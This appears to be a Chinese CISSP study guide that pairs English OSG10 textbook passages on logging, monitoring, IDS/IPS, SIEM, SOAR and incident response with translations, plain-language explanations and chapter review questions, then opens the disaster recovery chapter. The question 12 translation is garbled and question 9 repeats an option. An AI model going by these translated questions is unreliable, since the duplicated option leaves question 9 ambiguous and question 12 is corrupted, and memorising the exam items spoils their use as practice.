遏制 遏制先阻止事件继续扩大,不急着完全修复。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 72 / PDF P1209

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

educating users about the risks and the methods attackers commonly use to spread viruses helps users understand and avoid dangerous behaviors. Know the types of log files. Log data is recorded in databases and different types of log files. Common log files include security logs, system logs, application logs, firewall logs, proxy logs, and change management logs. Log files should be protected by centrally storing them and using permissions to restrict access, and archived logs should be set to read-only to prevent modifications. Understand monitoring and uses of monitoring tools. Monitoring is a form of auditing that focuses on active review of the log file data.

Monitoring is used to hold subjects accountable for their actions and to detect abnormal or malicious activities. It is also used to monitor system performance. Monitoring tools such as IDSs or SIEMs automate continuous monitoring and provide real-time analysis of events, including monitoring what happens inside a network, traffic entering a network, and traffic leaving a network (also known as egress monitoring). Log management includes analyzing logs and archiving logs. Be able to explain audit trails. Audit trails are the records created by recording information about events and occurrences into one or more databases or log files.

They are used to reconstruct an event, extract information about an incident, and prove or disprove culpability. Using audit trails is a passive form of detection security control, and audit trails are essential evidence in criminals’ prosecution. Understand how to maintain accountability. Accountability is maintained for individual subjects through the use of auditing. Logs record user activities and users can be held accountable for their logged actions. This directly promotes good user behavior and compliance with the organization's security policy. Describe threat feeds and threat hunting. Threat feeds provide organizations with a steady stream of raw data.

By analyzing threat feeds, security administrators can learn of current threats. They can then use this knowledge to search through the network, looking for signs of these threats. Know the benefits of SOAR. SOAR technologies automate responses to incidents. One of the primary benefits is that this reduces the workload of administrators. It also removes the possibility of human error by having computer systems respond.

中文直译 / 整理

通过教育用户了解风险以及攻击者常用的传播病毒方法,有助于用户理解并避免 危险行为。 了解日志文件的类型。 日志数据记录在数据库和不同类型的日志文件中。 常见的 日志文件包括安全日志、系统日志、应用程序日志、防火墙日志、代理日志和变 更管理日志。 日志文件应通过集中存储并使用权限限制访问来加以保护,归档日 志应设置为只读,以防止修改。 理解监控及监控工具的用途。 监控是一种审计形式,侧重于对日志文件数据进行 主动审查。 监控用于使主体对其行为负责,并检测异常或恶意活动。 它还用于监 控系统性能。 诸如IDS或SIEM之类的监控工具可自动化持续监控,并提供事件的 实时分析,包括监控网络内部发生的情况、进入网络的流量以及离开网络的流量 (也称为出口监控)。 日志管理包括分析日志和归档日志。 能够解释审计跟踪。 审计跟踪是通过将有关事件和发生情况的信息记录到一个 或多个数据库或日志文件中而创建的记录。 它们用于重建事件、提取事故相关 信息,以及证明或否定责任。 使用审计跟踪是一种被动的安全检测控制手段, 审计跟踪是起诉犯罪者的关键证据。 了解如何保持问责性。 通过审计来维护对各个主体的问责性。

日志记录用户活动, 用户对其被记录的操作负有责任。 这直接促进了良好的用户行为和对组织安全政 策的遵守。 描述威胁情报和威胁狩猎。 威胁情报为组织提供持续的原始数据流。 通过分析 威胁情报,安全管理员可以了解当前的威胁。 随后,他们可以利用这些知识在 网络中进行搜索,寻找这些威胁的迹象。 了解SOAR的优势。 SOAR技术可以自动化对事件的响应。 其主要优势之一是 减轻了管理员的工作负担。 同时,通过由计算机系统进行响应,消除了人为错 误的可能性。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

问责性:问责性要求能把行为绑定到具体主体。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
威胁狩猎 威胁狩猎是在已有迹象或怀疑时主动寻找妥协证据。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
学习单元 73 / PDF P1210

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Written Lab 1. Define an incident. 2. List the different phases of incident management identified in the CISSP Security Operations domain. 3. Describe the primary types of intrusion detection systems. 4. Discuss the benefits of a SIEM system. 5. Describe the purpose of SOAR technologies. Review Questions 1. Which of the following are valid incident management steps or phases as listed in the CISSP objectives? (Choose all that apply.) A. Prevention B. Detection C. Reporting D. Lessons learned E. Backup 2. A technician is troubleshooting a problem on a user's computer.

After viewing the host-based intrusion detection system (HIDS) logs, he determines that the computer has been compromised by malware. Of the following choices, what should he do next? A. Isolate the computer from the network. B. Review the HIDS logs of neighboring computers. C. Run an antivirus scan. D. Analyze the system to discover how it was infected. 3. Using the incident management steps identified by ISC2, which of the following occurs first? A. Response B. Mitigation C. Remediation

中文直译 / 整理

书面实验 1. 定义事件。 2. 列出CISSP安全运营领域中识别的事件管理的不同阶段。 3. 描述主要的入侵检测系统类型。 4. 讨论SIEM系统的优点。 5. 描述SOAR技术的目的。 复习问题 1. 以下哪些是CISSP目标中列出的有效事件管理步骤或阶段? (可多选) A. 预防 B. 检测 C. 报告 D. 经验教训 E. 备份 2. 一名技术人员正在排查用户计算机上的问题。 在查看基于主机的入侵检测 系统(HIDS)日志后,他确定该计算机已被恶意软件入侵。 以下选项中,他 接下来应该做什么? A. 将计算机与网络隔离。 B. 查看相邻计算机的 HIDS 日志。 C. 运行杀毒扫描。 D. 分析系统以查明其被感染的方式。 3. 使用ISC2识别的事件管理步骤,以下哪一项首先发生? A. 响应 B. 缓解 C. 补救

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

检测是 IDS,主动阻断更像 IPS。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 74 / PDF P1211

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

D. Detection 4. Which of the following are basic security controls that can prevent many attacks? (Choose three.) A. Keep systems and applications up-to-date. B. Implement security orchestration, automation, and response (SOAR) technologies. C. Remove or disable unneeded services or protocols. D. Use up-to-date anti-malware software. E. Use WAF firewalls at the border. 5. Security administrators are reviewing all the data gathered by event logging. Which of the following best describes this body of data? A. Identification B. Audit trails C. Authorization D. Confidentiality 6. A file server in your network recently crashed.

An investigation showed that logs grew so much that they filled the disk drive. You decide to enable rollover logging to prevent this from happening again. Which of the following should you do first? A. Configure the logs to overwrite old entries automatically. B. Copy existing logs to a different drive. C. Review the logs for any signs of attacks. D. Delete the oldest log entries. 7. You suspect an attacker has launched a Fraggle attack on a system. You check the logs and filter your search with the protocol used by Fraggle. What protocol would you use in the filter? A. User Datagram Protocol (UDP) B. Transmission Control Protocol (TCP) C. Internet Control Message Protocol (ICMP) D.

Security orchestration, automation, and response (SOAR) D.

中文直译 / 整理

检测 4. 以下哪些是可防止许多攻击的基本安全控制措施? (选择三项。 ) A. 保持系统和应用程序为最新版本。 B. 实施安全编排、自动化与响应(SOAR)技术。 C. 移除或禁用不必要的服务或协议。 D. 使用最新的反恶意软件。 E. 在边界处使用 WAF 防火墙。 5. 安全管理员正在审查事件日志收集的所有数据。 以下哪一项最能描述这 批数据? A. 身份识别 B. 审计跟踪 C. 授权 D. 机密性 6. 您网络中的一个文件服务器最近崩溃了。 调查表明,日志增长过多,占 满了磁盘驱动器。 您决定启用日志轮转以防止此类情况再次发生。 您首先 应该做什么? A. 配置日志以自动覆盖旧条目。 B. 将现有日志复制到另一个驱动器。 C. 检查日志中是否有攻击迹象。 D. 删除最旧的日志条目。 7. 您怀疑攻击者已对某系统发起Fraggle攻击。 您检查了日志,并使用 Fraggle使用的协议进行筛选。 您应在筛选中使用哪种协议? A. 用户数据报协议 (UDP) B. 传输控制协议 (TCP) C. 因特网控制报文协议 (ICMP) D. 安全编排、自动化与响应 (SOAR)

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 75 / PDF P1212

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

8. You are updating the training manual for security administrators and want to add a description of a zero-day exploit. Which of the following best describes a zero-day exploit? A. An attack that exploits a vulnerability that doesn't have a patch or fix B. A newly discovered vulnerability that doesn't have a patch or fix C. An attack on systems without an available patch D. Malware that delivers its payload after a user starts an application 9. Users in an organization complain that they can't access several websites that are usually available. After troubleshooting the issue, you discover that an intrusion protection system (IPS) is blocking the traffic, but the traffic is not malicious.

What does this describe? A. A false negative B. A honeynet C. A false positive D. Sandboxing 10. An administrator is installing a new intrusion detection system (IDS). It requires them to create a baseline before fully implementing it. Which of the following best describes this IDS? A. A pattern-matching IDS B. A knowledge-based IDS C. A signature-based IDS D. An anomaly-based IDS 11. An administrator is implementing an intrusion detection system. Once installed, it will monitor all traffic and raise alerts when it detects suspicious traffic. Which of the following best describes this system? A. A host-based intrusion detection system (HIDS) B.

A network-based intrusion detection system (NIDS) C. A honeynet D. A network firewall 12. You are installing a system that management hopes will reduce incidents in the network. The setup instructions require you to configure it inline 8.

中文直译 / 整理

您正在更新安全管理员的培训手册,希望添加有关零日漏洞的描述。 以 下哪一项最能描述零日漏洞? A. 利用一个尚未有补丁或修复措施的漏洞的攻击 B. 刚刚发现且尚无补丁或修复措施的漏洞 C. 针对没有可用补丁的系统的攻击 D. 在用户启动应用程序后才交付有效载荷的恶意软件 9. 某组织中的用户投诉无法访问几个通常可访问的网站。 经过故障排除,您 发现入侵防护系统(IPS)正在阻止这些流量,但这些流量并非恶意。 这描 述了什么情况? A. 一个误报 B. 一个蜜网 C. 一个误报 D. 沙盒 10. 一位管理员正在安装一个新的入侵检测系统(IDS)。 在完全实施之前, 需要创建一个基线。 以下哪一项最佳描述了该IDS? A. 一种基于模式匹配的IDS B. 基于知识的IDS C. 基于签名的IDS D. 基于异常的IDS 11. 一名管理员正在实施入侵检测系统。 安装后,它将监控所有流量,并在 检测到可疑流量时发出警报。 以下哪一项最能描述该系统?

A. 基于主机的入侵检测系统(HIDS) B. 基于网络的入侵检测系统(NIDS) C. 一个蜜网 D. 一个网络防火墙 12. 您正在安装 g a sy系统,用于管理 g控主机 pes 将减少事件 在网络中。 安装说明要求您将其配置为内联模式

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 76 / PDF P1213

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

with traffic so that all traffic goes through it before reaching the internal network. Which of the following choices best identifies this system? A. A network-based intrusion prevention system (NIPS) B. A network-based intrusion detection system (NIDS) C. A host-based intrusion prevention system (HIPS) D. A host-based intrusion detection system (HIDS) 13. After installing an application on a user's system, your supervisor told you to remove it because it is consuming most of the system's resources. Which of the following prevention systems did you most likely install? A. A network-based intrusion detection system (NIDS) B. A web application firewall (WAF) C.

A security information and event management (SIEM) system D. A host-based intrusion detection system (HIDS) 14. You are replacing a failed switch. The configuration documentation for the original switch indicates a specific port needs to be configured as a mirrored port. Which of the following network devices would connect to this port? A. An intrusion prevention system (IPS) B. An intrusion detection system (IDS) C. A honeypot D. A sandbox 15. A network includes a network-based intrusion detection system (NIDS). However, security administrators discovered that an attack entered the network, and the NIDS did not raise an alarm. What does this describe? A. A false positive B.

A false negative C. A Fraggle attack D. A Smurf attack 16. Management wants to add an intrusion detection system (IDS) that will detect new security threats. Which of the following is the best choice?

中文直译 / 整理

通过流量,以便所有流量在到达内部网络之前都经过它。 以下哪个选项最佳标 识了该系统? A. 基于网络的入侵防御系统(NIPS) B. 基于网络的入侵检测系统(NIDS) C. 基于主机的入侵防御系统(HIPS) D. 基于主机的入侵检测系统(HIDS) 13. 在用户系统上安装一个应用程序后,您的主管告诉您将其卸载,因为它占 用了系统大部分资源。 您最有可能安装了以下哪种防御系统? A. 基于网络的入侵检测系统(NIDS) B. 一个Web应用防火墙(WAF) C. 一个安全信息和事件管理(SIEM)系统 D. 一个基于主机的入侵检测系统(HIDS) 14. 你正在更换一个故障的交换机。 原始交换机的配置文档指出,需要将某个 特定端口配置为镜像端口。 以下哪种网络设备会连接到此端口? A. 一个入侵防御系统(IPS) B. 一个入侵检测系统(IDS) C. 一个蜜罐 D. 一个沙箱 15. 一个网络包含一个基于网络的入侵检测系统(NIDS)。 然而,安全管理 员发现有攻击进入了网络,但NIDS并未发出警报。 这描述的是什么?

A. 一个误报 B. 一个漏报 C. 一个Fraggle攻击 D. 一个Smurf攻击 16. 管理层希望添加一个入侵检测系统(IDS),以检测新的安全威胁。 以下哪 一项是最佳选择?

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 77 / PDF P1214

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

A. A signature-based IDS B. An anomaly detection IDS C. An active IDS D. A network-based IDS 17. Your organization recently implemented a centralized application for monitoring. Which of the following best describes this? A. SOAR B. SIEM C. HIDS D. Threat feed 18. After a recent attack, management decided to implement an egress monitoring system that will prevent data exfiltration. Which of the following is the best choice? A. An NIDS B. An NIPS C. A firewall D. A DLP system 19. Security administrators are regularly monitoring threat feeds and using that information to check systems within the network.

Their goal is to discover any infections or attacks that haven't been detected by existing tools. What does this describe? A. Threat hunting B. Threat intelligence C. Implementing the kill chain D. Using artificial intelligence 20. Administrators find that they are repeating the same steps to verify intrusion detection system alerts and perform more repetitive steps to mitigate well-known attacks. Of the following choices, what can automate these steps? A. SOAR A.

中文直译 / 整理

基于签名的IDS B. 异常检测IDS C. 主动IDS D. 基于网络的IDS 17. 您的组织最近实施了一个集中式监控应用程序。 以下哪一项最能描述这一 点? A. SOAR B. SIEM C. HIDS D. 威胁情报 18. 在最近的一次攻击之后,管理层决定实施一个出口监控系统,以防 止数据外泄。 以下哪项是最佳选择? A. 一个NIDS B. 一个NIPS C. 一个防火墙 D. 一个DLP系统 19. 安全管理员定期监控威胁情报源,并利用这些信息检查网络内的系统。 他们的目标是发现现有工具未能检测到的任何感染或攻击。 这描述的是什么? A. 威胁狩猎 B. 威胁情报 C. 实施杀伤链 D. 使用人工智能 20. 管理员发现他们反复执行相同的步骤来验证入侵检测系统警报,并执行 更多重复性步骤以缓解已知攻击。 以下选项中,哪个可以自动化这些步骤? A. SOAR

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

威胁狩猎:威胁狩猎是在已有迹象或怀疑时主动寻找妥协证据。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

Threat modeling 偏预防设计,threat hunting 偏主动发现已存在威胁。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
威胁狩猎 威胁狩猎是在已有迹象或怀疑时主动寻找妥协证据。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 78 / PDF P1215

第 1215 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

B. SIEM C. NIDS D. DLP B. SIEM C. NIDS D. DLP

中文直译 / 整理

本页 PDF 没有提取到对应文本,可能是图像、页眉或跨页内容。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1215 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
第 18 章 · P1217-1279 · 63 个学习单元

灾难恢复规划

OSG10 · Chapter 18 · Disaster Recovery Planning · 全文覆盖 + 小白精读 + 画报

第 18 章:灾难恢复规划

这不是提炼版。本页按 PDF 第 1217-1279 页连续覆盖第 18 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

63个连续学习单元
4格原文 / 直译 / 解释 / 考点
63页覆盖第18章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P1217

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 6.0: Security Assessment and Testing 6.3 Collect security process data (e.g., technical and administrative) 6.3.5 Training and awareness 6.3.6 Disaster recovery (DR) and Business Continuity (BC) Domain 7.0: Security Operations 7.10 Implement recovery strategies 7.10.1 Backup storage strategies (e.g., cloud storage, onsite, offsite) 7.10.2 Recovery site strategies (e.g., cold versus hot, resource capacity agreements) 7.10.3 Multiple processing sites 7.10.4 System resilience, high availability (HA), Quality of Service (QoS), and fault tolerance 7.11 Implement disaster recovery (DR) processes 7.11.1 Response 7.11.2 Personnel 7.11.3 Communications (i.e., methods) 7.11.4 Assessment 7.11.5 Restoration 7.11.6 Training and awareness 7.11.7 Lessons learned 7.12 Test disaster recovery plan (DRP) 7.12.1 Read-through/tabletop 7.12.2 Walkthrough 7.12.3 Simulation 7.12.4 Parallel

中文直译 / 整理

本章涵盖的CISSP主题包括: 领域6.0:安全评估与测试 6.3 收集安全流程数据(例如技术性和管理性) 6.3.5 培训与意识 6.3.6 灾难恢复(DR)和业务连续性(BC) 领域7.0:安全运营 7.10 实施恢复策略 7.10.1 备份存储策略(例如:云存储、本地、异地) 7.10.2 恢复站点策略(例如:冷备与热备、资源容量协议) 7.10.3 多个处理站点 7.10.4 系统弹性、高可用性(HA)、服务质量(QoS)和容错性 7.11 实施灾难恢复(DR)流程 7.11.1 响应 7.11.2 人员 7.11.3 通信(即方法) 7.11.4 评估 7.11.5 恢复 7.11.6 培训和意识 7.11.7 经验教训 7.12 测试灾难恢复计划(DRP) 7.12.1 阅读/桌面演练 7.12.2 演练 7.12.3 模拟 7.12.4 并行

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

NIST:NIST 提供美国常用安全标准、框架和指南。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

